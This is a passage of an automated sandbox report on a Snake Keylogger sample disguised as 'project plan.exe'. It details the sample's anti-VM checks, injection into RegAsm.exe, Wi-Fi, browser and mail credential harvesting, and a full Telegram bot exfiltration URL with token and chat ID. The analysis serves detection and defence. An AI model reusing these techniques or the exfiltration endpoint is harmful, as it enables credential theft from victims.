Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dc9b102694a6ea<
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\project plan.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00F688C0 LdrInitializeThunk,LdrInitializeThunk, 3_2_00F688C0
Enables debug privileges
Source: C:\Users\user\Desktop\project plan.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: project plan.exe, -------.cs Reference to suspicious API methods: GetProcAddress(_08EA_08E2_EE64_061A_EED3_EEFF, _0618_08D2_08F2_EE97_EE3A_EE20_EEBB_ECB4_064E_EE6B_EE7F_EE03_EEDF_060F)
Source: project plan.exe, -------.cs Reference to suspicious API methods: VirtualProtect(procAddress, (uint)_0E74_06DC_066D_EE6C_0EBB_EE37_EE1D_EE5B_08FF_08E8_06FD_EEF9.Length, 64u, out var _EE1B_0EB9_EE85_EEF8_0E68_06DC_061E_EE14_EE69_EED8_0EB6_EE43_EE2E_EEA0_0E7F_EE71)
Source: project plan.exe, -------.cs Reference to suspicious API methods: LoadLibrary(_EEF9_08FE_ECA9_EEE9(_0602_EC97_06D8_EE8E_EE96_ECA5_EEBD_EE09_EEE3_EE39._ECB1_ECB7_066B_EE9D_EE63_ECAC_06DC_06EB))
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\project plan.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\project plan.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\project plan.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000 Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 424000 Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AFF008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\project plan.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\project plan.exe Queries volume information: C:\Users\user\Desktop\project plan.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3221467298.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR
Tries to harvest and steal WLAN passwords
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3221467298.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466687 Sample: project plan.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 29 api.telegram.org 2->29 31 checkip.dyndns.org 2->31 33 checkip.dyndns.com 2->33 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Sigma detected: Capture Wi-Fi password 2->43 47 8 other signatures 2->47 9 project plan.exe 3 2->9         started        signatures3 45 Uses the Telegram API (likely for C&C communication) 29->45 process4 signatures5 49 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->49 51 Writes to foreign memory regions 9->51 53 Allocates memory in foreign processes 9->53 55 Injects a PE file into a foreign processes 9->55 12 RegAsm.exe 15 2 9->12         started        16 WerFault.exe 19 16 9->16         started        19 conhost.exe 9->19         started        21 RegAsm.exe 9->21         started        process6 dnsIp7 35 api.telegram.org 149.154.167.220, 443, 49711 TELEGRAMRU United Kingdom 12->35 37 checkip.dyndns.com 132.226.247.73, 49704, 80 UTMEMUS United States 12->37 57 Tries to steal Mail credentials (via file / registry access) 12->57 59 Uses netsh to modify the Windows network and firewall settings 12->59 61 Tries to harvest and steal browser information (history, passwords, etc) 12->61 63 Tries to harvest and steal WLAN passwords 12->63 23 netsh.exe 2 12->23         started        27 C:\ProgramData\Microsoft\...\Report.wer, Unicode 16->27 dropped file8 signatures9 process10 process11 25 conhost.exe 23->25         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
132.226.247.73
 checkip.dyndns.com United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.247.73 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake false
  • Avira URL Cloud: safe
 unknown
http://checkip.dyndns.org/ false
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown